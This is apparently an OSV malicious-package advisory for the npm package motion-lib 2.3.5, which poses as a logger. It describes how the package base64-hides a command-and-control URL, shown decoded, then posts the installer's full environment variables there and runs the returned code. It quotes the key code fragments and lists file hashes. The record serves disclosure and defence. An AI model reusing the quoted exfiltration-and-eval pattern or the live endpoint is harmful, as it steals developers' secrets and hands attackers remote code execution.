{"id":"MAL-2026-5925","summary":"Malicious code in motion-lib (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (0dec07d83d6427eb2c76e0ab74e5f31f424e769c187e6d48df0de3575df2e176)\nmotion-lib@2.3.5 masquerades as a pino-style logger (exports module.exports.pino, ships proto.js/multistream.js/transport.js/redaction.js/levels.js, advertises 'fast','logger','stream','json' keywords) but its middleware factory in index.js spawns a detached `node lib/initializeCaller.js`. That script shadows `process` with a local object whose `env.DEV_API_KEY` holds a base64-encoded string that decodes to https://ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df, then POSTs the host's full real `process.env` to that endpoint with header `x-secret-header: secret` (`axios.post(apiEndpoint, {...process.env },...)`). The HTTP response body is then executed via `new Function('require', response.data); executor(require);`, giving the remote endpoint arbitrary code execution with full Node capabilities (filesystem, network, child_process) on the installer's machine.\nThe combination of full-environment exfiltration (AWS_*, GITHUB_TOKEN, NPM_TOKEN, CI secrets, DB creds), eval-of-remote-response RCE, base64 obfuscation of the C2 URL, and impersonation of a popular logger package is an unambiguous supply-chain attack.\n","modified":"2026-06-16T21:16:47.065403493Z","published":"2026-06-16T19:46:09Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-006827","versions":["2.3.5"],"import_time":"2026-06-16T21:06:46.893333119Z","modified_time":"2026-06-16T19:46:09Z","source":"amazon-inspector","sha256":"0dec07d83d6427eb2c76e0ab74e5f31f424e769c187e6d48df0de3575df2e176"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/motion-lib/v/2.3.5"}],"affected":[{"package":{"name":"motion-lib","ecosystem":"npm","purl":"pkg:npm/motion-lib"},"versions":["2.3.5"],"database_specific":{"cwes":[{"name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506"}],"indicators":{"evidence_files":[{"path":"lib/initializeCaller.js","tlsh":"f921f38e15fe101d066751e6bb2f24027022e8133946d4a47bcc835b1fc966e99936df","sha256":"fc61b0ed62e346bfbb5e1e093e475d8b3065247dc8d315f0ea4e7cafd9661bad"},{"path":"index.js","tlsh":"0f318545b5f21259126d98c4f6b4a5263cdf9437331b76b1cded93952bce2080032bc7","sha256":"1f51184c197102444a2c8a23e4a8e54a6479750420512922fcb5d5f795c33911"}],"package_integrity":[{"hashes":{"sha1":"54e31dbde7db0816917f2c63b0934be741bce117","sha512_sri":"sha512-VqRbZ1gRQ03qx3Gt+NIJQ21VhgaS6GT5+W5WSRbBtAw+MyeIR5O1m/Wkk7NHThZpw4n0LvpLxSjwRgYsXjWs9g=="},"filename":"motion-lib-2.3.5.tgz"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/motion-lib/MAL-2026-5925.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}